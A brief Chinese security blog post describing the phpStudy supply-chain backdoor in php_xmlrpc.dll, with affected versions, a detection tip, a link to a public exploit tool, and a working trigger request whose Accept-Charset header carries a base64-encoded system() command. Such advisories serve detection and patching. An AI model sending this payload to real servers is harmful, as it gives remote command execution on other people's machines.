天道酬勤

phpStudy后门

##phpStudy简介

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。

##漏洞概述

使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。

##影响版本

phpStudy20161103版本:

php5.4.45与php5.2.17

phpStudy20180211版本:

php5.4.45与php5.2.17

##漏洞检测

1、查看phpStudy下相应有后门的php版本的文件 php_xmlrpc.dll

记事本打开,搜索 eval,如下表示,则代表有后门。

2、利用工具:PHPStudy_BackDoor_EXP

链接地址:https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

3、访问任意一个php文件,进行burp抓包修改

添加请求字段:accept-Encoding 和 Accept-Charset

  • accept-Encoding:gzip,deflate
  • Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==   //system(“ipconfig”)的base64

##漏洞修复

去官网重新下载最新版

本文内容仅用于学习交流,切勿用于非法用途!

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » phpStudy后门
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏